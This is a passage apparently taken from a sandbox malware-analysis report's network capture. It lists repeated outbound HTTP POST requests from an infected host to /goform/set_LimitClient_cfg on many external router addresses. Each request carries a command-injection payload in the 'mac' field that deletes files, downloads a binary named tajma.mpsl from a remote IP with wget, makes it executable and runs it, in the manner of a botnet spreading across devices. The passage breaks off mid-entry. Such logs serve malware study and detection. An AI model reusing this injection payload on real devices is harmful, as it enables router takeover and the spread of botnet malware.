                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        560192.168.2.235894095.41.143.1268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.361633062 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        561192.168.2.233345425.104.56.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.361655951 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        562192.168.2.2332782122.82.223.128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.362081051 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        563192.168.2.235540497.211.219.1548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.362209082 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        564192.168.2.2333632169.201.208.418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.362226009 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        565192.168.2.2347904144.243.151.2168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.362382889 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        566192.168.2.2352394138.67.131.1458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.363153934 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        567192.168.2.234779671.30.55.278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.363184929 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        568192.168.2.2357148140.48.163.2038080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.363296986 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        569192.168.2.233528217.62.243.1498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.363851070 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        570192.168.2.2343474189.44.233.1158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.363948107 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        571192.168.2.2354208119.36.246.1718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.363980055 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        572192.168.2.235658276.206.42.78080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.364013910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        573192.168.2.2360420189.145.26.2468080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.364134073 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        574192.168.2.2336650185.61.72.258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.364134073 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        575192.168.2.235059480.37.206.2148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.364343882 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        576192.168.2.2342174162.8.5.2528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.364403009 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        577192.168.2.234895092.225.249.358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.364815950 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        578192.168.2.2346504174.33.224.2138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.364845991 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        579192.168.2.2334300139.202.213.68080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.364924908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        580192.168.2.2349350137.12.26.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.365860939 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        581192.168.2.2352114192.36.192.1368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.365998030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        582192.168.2.234286491.142.92.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.366034031 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
